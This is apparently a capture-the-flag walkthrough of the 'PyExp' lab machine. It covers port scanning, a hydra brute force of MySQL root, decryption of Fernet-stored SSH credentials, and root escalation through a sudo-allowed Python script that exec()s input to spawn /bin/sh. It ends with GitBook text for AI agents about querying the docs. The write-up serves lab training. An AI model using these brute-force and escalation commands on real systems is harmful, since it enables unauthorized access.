> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/pyexp.md). # PyExp ## Nmap ``` sudo nmap 192.168.75.118 -p- -sS -sV PORT STATE SERVICE VERSION 1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` With only `SSH` and `MySQL` open we can start bruteforcing MySQL. As the root account generally always exists we can start by bruteforcing this using the rockyou.txt wordlist. ``` hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.75.118 ``` ![](/files/-MY0steVUuQA_Dw-nXxD) With the valid credentials of `root:prettywoman` we can now login to MySQL. ``` mysql -u root -p -h 192.168.75.118 ``` ![](/files/-MY0tJSI9Pp33GIl98kF) Viewing available databases we find the database 'data' which contains a table called 'fernet'. This table contains a token and key as shown below. ![](/files/-MY0vwS9-ksUwoRI861O) The values are: ``` cred gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= keyy UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= ``` I tried decoding these with base64 and a few others. No luck with any legible output. Researching the words fernet and encode give us the following result: Entering the details we have found give the results below. ![https://asecuritysite.com/encryption/ferdecode](/files/-MY0wUiT3hVN4sOr7Rd0) These credentials returned are: ``lucy:wJ9`"Lemdv9[FEw-`` Which allow us to login with SSH as the user lucy. ``` ssh -p 1337 lucy@192.168.75.118 ``` ![](/files/-MY0wqeMFAUhwPucTA3q) Checking sudo permissions with `sudo -l` shows we can run `/usr/bin/python2 /opt/exp.py` as root without specifying a password. ![](/files/-MY0y-j36wTUVRrWIDfA) Reading the contents of /opt/exp.py: ``` uinput = raw_input('how are you?') exec(uinput) ``` Looks like this script will ask us a question which prompts raw input. If we can escape the shell whilst the script is active we should be able to maintain escalated privileges. Use the command below to escape the shell when prompted for input. ``` import os; os.system("/bin/sh") ``` ![](/files/-MY0zy40QT-J1ch6y8Yo) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/pyexp.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.